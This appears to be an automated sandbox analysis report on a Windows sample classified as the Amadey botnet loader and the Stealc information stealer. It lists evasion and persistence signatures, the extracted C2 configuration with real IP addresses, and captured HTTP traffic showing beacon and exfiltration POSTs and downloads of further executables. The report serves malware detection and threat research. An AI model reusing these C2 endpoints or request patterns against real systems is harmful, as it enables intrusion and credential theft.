Windows Analysis Report
file.exe

Overview

General Information

Sample name: file.exe
Analysis ID: 1554128
MD5: b58725b0a514974aae36a20730adc4b3
SHA1: a99eb4395fc9a95cad952a7d4bd444fb3baa9103
SHA256: a64238bb65c406ec9ef9267f96de8b2ff4a2dc1998859970f2b7399aed50db76
Tags: exeuser-Bitsight
Infos:

Detection

Amadey, Credential Flusher, Stealc
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Antivirus detection for dropped file
Detected unpacking (changes PE section rights)
Found malware configuration
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected Amadeys stealer DLL
Yara detected Credential Flusher
Yara detected Powershell download and execute
Yara detected Stealc
AI detected suspicious sample
Binary is likely a compiled AutoIt script file
C2 URLs / IPs found in malware configuration
Creates multiple autostart registry keys
Excessive usage of taskkill to terminate processes
Found API chain indicative of sandbox detection
Hides threads from debuggers
Machine Learning detection for dropped file
Machine Learning detection for sample
PE file contains section with special chars
Sigma detected: New RUN Key Pointing to Suspicious Folder
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Tries to detect sandboxes and other dynamic analysis tools (window names)
Tries to detect virtualization through RDTSC time measurements
Tries to evade debugger and weak emulator (self modifying code)
Checks for debuggers (devices)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality for execution timing, often used to detect debuggers
Contains functionality for read data from the clipboard
Contains functionality to block mouse and keyboard input (often used to hinder debugging)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to execute programs as a different user
Contains functionality to launch a process as a different user
Contains functionality to launch a program with higher privileges
Contains functionality to modify clipboard data
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate keystroke presses
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Creates job files (autostart)
Detected potential crypto function
Downloads executable code via HTTP
Dropped file seen in connection with other malware
Drops PE files
Enables debug privileges
Entry point lies outside standard sections
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
OS version to string mapping found (often used in BOTs)
PE file contains an invalid checksum
PE file contains sections with non-standard names
Potential key logger detected (key state polling based)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: CurrentVersion Autorun Keys Modification
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Uses taskkill to terminate processes

Classification

Name Description Attribution Blogpost URLs Link
Amadey Amadey is a botnet that appeared around October 2018 and is being sold for about $500 on Russian-speaking hacking forums. It periodically sends information about the system and installed AV software to its C2 server and polls to receive orders from it. Its main functionality is that it can load other payloads (called "tasks") for all or specifically targeted computers compromised by the malware. No Attribution https://malpedia.caad.fkie.fraunhofer.de/details/win.amadey
Name Description Attribution Blogpost URLs Link
Stealc Stealc is an information stealer advertised by its presumed developer Plymouth on Russian-speaking underground forums and sold as a Malware-as-a-Service since January 9, 2023. According to Plymouth's statement, stealc is a non-resident stealer with flexible data collection settings and its development is relied on other prominent stealers: Vidar, Raccoon, Mars and Redline.Stealc is written in C and uses WinAPI functions. It mainly targets date from web browsers, extensions and Desktop application of cryptocurrency wallets, and from other applications (messengers, email clients, etc.). The malware downloads 7 legitimate third-party DLLs to collect sensitive data from web browsers, including sqlite3.dll, nss3.dll, vcruntime140.dll, mozglue.dll, freebl3.dll, softokn3.dll and msvcp140.dll. It then exfiltrates the collected information file by file to its C2 server using HTTP POST requests. No Attribution https://malpedia.caad.fkie.fraunhofer.de/details/win.stealc

AV Detection
barindex
Antivirus / Scanner detection for submitted sample
Source: file.exe Avira: detected
Antivirus detection for URL or domain
Source: http://185.215.113.16/Jo89Ku7d/index.phpvM Avira URL Cloud: Label: phishing
Source: http://185.215.113.16/ows Avira URL Cloud: Label: phishing
Source: http://185.215.113.16/Jo89Ku7d/index.php1001 Avira URL Cloud: Label: phishing
Source: http://185.215.113.16/Jo89Ku7d/index.php2001 Avira URL Cloud: Label: phishing
Source: http://185.215.113.16/lfons Avira URL Cloud: Label: phishing
Antivirus detection for dropped file
Source: C:\Users\user\AppData\Local\Temp\1002741001\63371c25d6.exe Avira: detection malicious, Label: TR/Crypt.TPM.Gen
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Avira: detection malicious, Label: TR/Crypt.TPM.Gen
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\random[1].exe Avira: detection malicious, Label: TR/Crypt.TPM.Gen
Found malware configuration
Source: 00000006.00000002.3281517208.00000000009D1000.00000040.00000001.01000000.00000007.sdmp Malware Configuration Extractor: Amadey {"C2 url": "185.215.113.16/Jo89Ku7d/index.php", "Version": "4.41", "Install Folder": "44111dbc49", "Install File": "axplong.exe"}
Source: 63371c25d6.exe.1992.7.memstrmin Malware Configuration Extractor: StealC {"C2 url": "185.215.113.206/c4becf79229cb002.php", "Botnet": "mars"}
Multi AV Scanner detection for domain / URL
Source: http://185.215.113.16/Jo89Ku7d/index.phpvM Virustotal: Detection: 20% Perma Link
Source: http://185.215.113.16/ows Virustotal: Detection: 14% Perma Link
Source: http://185.215.113.16/Jo89Ku7d/index.php2001 Virustotal: Detection: 22% Perma Link
Multi AV Scanner detection for dropped file
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\random[1].exe ReversingLabs: Detection: 55%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\random[1].exe ReversingLabs: Detection: 34%
Source: C:\Users\user\AppData\Local\Temp\1002741001\63371c25d6.exe ReversingLabs: Detection: 34%
Source: C:\Users\user\AppData\Local\Temp\1002742001\b29e59e54d.exe ReversingLabs: Detection: 55%
Multi AV Scanner detection for submitted file
Source: file.exe Virustotal: Detection: 47% Perma Link
AI detected suspicious sample
Source: Submited Sample Integrated Neural Analysis Model: Matched 100.0% probability
Machine Learning detection for dropped file
Source: C:\Users\user\AppData\Local\Temp\1002742001\b29e59e54d.exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\1002741001\63371c25d6.exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\random[1].exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\random[1].exe Joe Sandbox ML: detected
Machine Learning detection for sample
Source: file.exe Joe Sandbox ML: detected
Uses 32bit PE files
Source: file.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: unknown HTTPS traffic detected: 35.244.181.201:443 -> 192.168.2.5:50006 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.160.144.191:443 -> 192.168.2.5:50009 version: TLS 1.2
Source: unknown HTTPS traffic detected: 35.244.181.201:443 -> 192.168.2.5:50064 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.160.144.191:443 -> 192.168.2.5:50065 version: TLS 1.2
Source: Binary string: "description": "The name of the library's debug file. For example, 'xul.pdb" source: firefox.exe, 00000027.00000002.3085467799.000001EF2EA3F000.00000004.00000800.00020000.00000000.sdmp
Source: C:\Users\user\AppData\Local\Temp\1002742001\b29e59e54d.exe Code function: 8_2_0094DBBE lstrlenW,GetFileAttributesW,FindFirstFileW,FindClose, 8_2_0094DBBE
Source: C:\Users\user\AppData\Local\Temp\1002742001\b29e59e54d.exe Code function: 8_2_0091C2A2 FindFirstFileExW, 8_2_0091C2A2
Source: C:\Users\user\AppData\Local\Temp\1002742001\b29e59e54d.exe Code function: 8_2_009568EE FindFirstFileW,FindClose, 8_2_009568EE
Source: C:\Users\user\AppData\Local\Temp\1002742001\b29e59e54d.exe Code function: 8_2_0095698F FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToSystemTime,FileTimeToSystemTime, 8_2_0095698F
Source: C:\Users\user\AppData\Local\Temp\1002742001\b29e59e54d.exe Code function: 8_2_0094D076 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose, 8_2_0094D076
Source: C:\Users\user\AppData\Local\Temp\1002742001\b29e59e54d.exe Code function: 8_2_0094D3A9 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose, 8_2_0094D3A9
Source: C:\Users\user\AppData\Local\Temp\1002742001\b29e59e54d.exe Code function: 8_2_00959642 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose, 8_2_00959642
Source: C:\Users\user\AppData\Local\Temp\1002742001\b29e59e54d.exe Code function: 8_2_0095979D SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose, 8_2_0095979D
Source: C:\Users\user\AppData\Local\Temp\1002742001\b29e59e54d.exe Code function: 8_2_00959B2B FindFirstFileW,Sleep,FindNextFileW,FindClose, 8_2_00959B2B
Source: C:\Users\user\AppData\Local\Temp\1002742001\b29e59e54d.exe Code function: 8_2_00955C97 FindFirstFileW,FindNextFileW,FindClose, 8_2_00955C97
Source: firefox.exe Memory has grown: Private usage: 1MB later: 187MB

Networking
barindex
Suricata IDS alerts for network traffic
Source: Network traffic Suricata IDS: 2856147 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M3 : 192.168.2.5:49937 -> 185.215.113.16:80
Source: Network traffic Suricata IDS: 2856122 - Severity 1 - ETPRO MALWARE Amadey CnC Response M1 : 185.215.113.16:80 -> 192.168.2.5:49937
Source: Network traffic Suricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.2.5:49958 -> 185.215.113.16:80
Source: Network traffic Suricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.2.5:49978 -> 185.215.113.16:80
Source: Network traffic Suricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.5:49974 -> 185.215.113.206:80
Source: Network traffic Suricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.5:50008 -> 185.215.113.206:80
Source: Network traffic Suricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.5:50027 -> 185.215.113.206:80
C2 URLs / IPs found in malware configuration
Source: Malware configuration extractor URLs: 185.215.113.206/c4becf79229cb002.php
Source: Malware configuration extractor IPs: 185.215.113.16
Downloads executable code via HTTP
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Tue, 12 Nov 2024 04:03:04 GMTContent-Type: application/octet-streamContent-Length: 1834496Last-Modified: Tue, 12 Nov 2024 03:02:29 GMTConnection: keep-aliveETag: "6732c545-1bfe00"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 ce ac e2 38 8a cd 8c 6b 8a cd 8c 6b 8a cd 8c 6b e5 bb 27 6b 92 cd 8c 6b e5 bb 12 6b 87 cd 8c 6b e5 bb 26 6b b0 cd 8c 6b 83 b5 0f 6b 89 cd 8c 6b 83 b5 1f 6b 88 cd 8c 6b 0a b4 8d 6a 89 cd 8c 6b 8a cd 8d 6b d1 cd 8c 6b e5 bb 23 6b 98 cd 8c 6b e5 bb 11 6b 8b cd 8c 6b 52 69 63 68 8a cd 8c 6b 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 07 00 4f c3 2f 67 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0a 00 00 96 02 00 00 40 22 00 00 00 00 00 00 90 6a 00 00 10 00 00 00 b0 02 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 01 00 00 00 00 00 05 00 01 00 00 00 00 00 00 c0 6a 00 00 04 00 00 c6 04 1c 00 02 00 40 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 4d b0 24 00 61 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 b1 24 00 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 00 20 20 20 20 00 90 24 00 00 10 00 00 00 62 01 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 20 20 20 00 10 00 00 00 a0 24 00 00 00 00 00 00 72 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 20 20 00 10 00 00 00 b0 24 00 00 02 00 00 00 72 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 20 20 20 20 20 20 20 20 00 50 2b 00 00 c0 24 00 00 02 00 00 00 74 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 6d 6d 67 79 78 6f 6b 64 00 70 1a 00 00 10 50 00 00 62 1a 00 00 76 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 75 6a 6a 74 73 6a 78 77 00 10 00 00 00 80 6a 00 00 04 00 00 00 d8 1b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 74 61 67 67 61 6e 74 00 30 00 00 00 90 6a 00 00 22 00 00 00 dc 1b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Tue, 12 Nov 2024 04:03:07 GMTContent-Type: application/octet-streamContent-Length: 919552Last-Modified: Tue, 12 Nov 2024 03:01:08 GMTConnection: keep-aliveETag: "6732c4f4-e0800"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 9a c7 83 ae de a6 ed fd de a6 ed fd de a6 ed fd 6a 3a 1c fd fd a6 ed fd 6a 3a 1e fd 43 a6 ed fd 6a 3a 1f fd fd a6 ed fd 40 06 2a fd df a6 ed fd 8c ce e8 fc f3 a6 ed fd 8c ce e9 fc cc a6 ed fd 8c ce ee fc cb a6 ed fd d7 de 6e fd d7 a6 ed fd d7 de 7e fd fb a6 ed fd de a6 ec fd f7 a4 ed fd 7b cf e3 fc 8e a6 ed fd 7b cf ee fc df a6 ed fd 7b cf 12 fd df a6 ed fd de a6 7a fd df a6 ed fd 7b cf ef fc df a6 ed fd 52 69 63 68 de a6 ed fd 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 ec c4 32 67 00 00 00 00 00 00 00 00 e0 00 22 01 0b 01 0e 10 00 ac 09 00 00 58 04 00 00 00 00 00 77 05 02 00 00 10 00 00 00 c0 09 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 01 00 00 00 00 00 05 00 01 00 00 00 00 00 00 60 0e 00 00 04 00 00 d5 b4 0e 00 02 00 40 80 00 00 40 00 00 10 00 00 00 00 40 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 64 8e 0c 00 7c 01 00 00 00 40 0d 00 28 9c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e0 0d 00 94 75 00 00 f0 0f 0b 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 34 0c 00 18 00 00 00 10 10 0b 00 40 00 00 00 00 00 00 00 00 00 00 00 00 c0 09 00 94 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 1d ab 09 00 00 10 00 00 00 ac 09 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 82 fb 02 00 00 c0 09 00 00 fc 02 00 00 b0 09 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 6c 70 00 00 00 c0 0c 00 00 48 00 00 00 ac 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 28 9c 00 00 00 40 0d 00 00 9e 00 00 00 f4 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 94 75 00 00 00 e0 0d 00 00 76 00 00 00 92 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
HTTP GET or POST without a user agent
Source: global traffic HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 44 46 31 41 32 34 46 43 33 46 39 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CDF1A24FC3F9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Source: global traffic HTTP traffic detected: GET /steam/random.exe HTTP/1.1Host: 185.215.113.16
Source: global traffic HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 30 32 37 34 31 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1002741001&unit=246122658369
Source: global traffic HTTP traffic detected: GET /well/random.exe HTTP/1.1Host: 185.215.113.16
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.206Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 30 32 37 34 32 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1002742001&unit=246122658369
Source: global traffic HTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----FBAFIIJKJEGIDGDGIIDHHost: 185.215.113.206Content-Length: 211Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 46 42 41 46 49 49 4a 4b 4a 45 47 49 44 47 44 47 49 49 44 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 46 43 36 46 31 45 45 46 30 42 46 34 32 36 38 31 32 30 39 37 32 34 0d 0a 2d 2d 2d 2d 2d 2d 46 42 41 46 49 49 4a 4b 4a 45 47 49 44 47 44 47 49 49 44 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 6d 61 72 73 0d 0a 2d 2d 2d 2d 2d 2d 46 42 41 46 49 49 4a 4b 4a 45 47 49 44 47 44 47 49 49 44 48 2d 2d 0d 0a Data Ascii: ------FBAFIIJKJEGIDGDGIIDHContent-Disposition: form-data; name="hwid"FC6F1EEF0BF42681209724------FBAFIIJKJEGIDGDGIIDHContent-Disposition: form-data; name="build"mars------FBAFIIJKJEGIDGDGIIDH--
Source: global traffic HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 44 46 31 41 32 34 46 43 33 46 39 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CDF1A24FC3F9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Source: global traffic HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 44 46 31 41 32 34 46 43 33 46 39 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CDF1A24FC3F9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Source: global traffic HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 44 46 31 41 32 34 46 43 33 46 39 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CDF1A24FC3F9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Source: global traffic HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 44 46 31 41 32 34 46 43 33 46 39 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CDF1A24FC3F9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Source: global traffic HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
